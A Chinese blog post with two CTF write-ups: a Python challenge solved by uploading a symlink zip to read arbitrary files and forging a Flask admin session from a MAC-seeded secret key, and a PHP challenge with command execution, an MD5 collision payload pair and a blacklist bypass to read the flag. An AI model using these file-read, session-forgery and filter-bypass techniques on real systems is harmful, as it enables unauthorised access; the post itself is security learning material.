携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第16天,点击查看活动详情
一、babypython[国赛总决赛复现]
考点:硬链接读取任意文件、伪造session
这个题当时打开是一个文件上传 然后上传一个文件 显示需要上传zipfile,当时用bp拦截 改zip 上传成功后 没有回显文件的路径
然后就卡住了 后来发现这个题考点是 硬链接读取任意文件 伪造session
ln -si /app/y0u_found_it.ini link
zip --symlinks 1.zip link
通过上述的两条命令可以构造硬链接,从而读取任意文件。不过过滤了environ,但是其他内容都没有过滤,直接一条龙访问过去了。
图中
uuid.getnode()主要是获取mac地址,读取/sys/class/net/eth0/address文件内容,构造一个脚本即可(需要注意的是这里是Python3的环境,所以要用Python3跑)
import uuid
import random
random.seed(int("0242ac1085a9",16))
print(str(random.random()*100))
#Python3 74.74211296004316
#Python2 74.74211296
最后构造一个flask网站用来获取Cookie值
from flask import *
app = Flask(__name__)
app.config['SECRET_KEY'] = "74.74211296004316"
@app.route("/",methods=['GET','POST'])
def login():
session['username'] = u'admin'
return 'atao'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)
二、BUUCTF-[安洵杯 2019]easy_web
卷死我吧 大吐
两次base 然后十六进制 得到 5.jpg 然后 将 index.php 先十六进制 再base两次 得到 TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 然后上传 得到源码
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
关键代码:
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
有一个MD5强绕过,解法如下 这是强碰撞 a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2 &b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
再看到源代码
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
虽然过滤了ls但是我们可以用dir\
发现没有flag,在访问根目录
注意他这里好像过滤了空格,得用%20代替空格
发现根目录下有flag,但是过滤了cat
绕过方法:
ca\t 后面的\t会成为 TAB 而绕过,看来以后特殊符号得熟悉
接着就简单了
查询bin下的flag文件
ca\t%20/flag
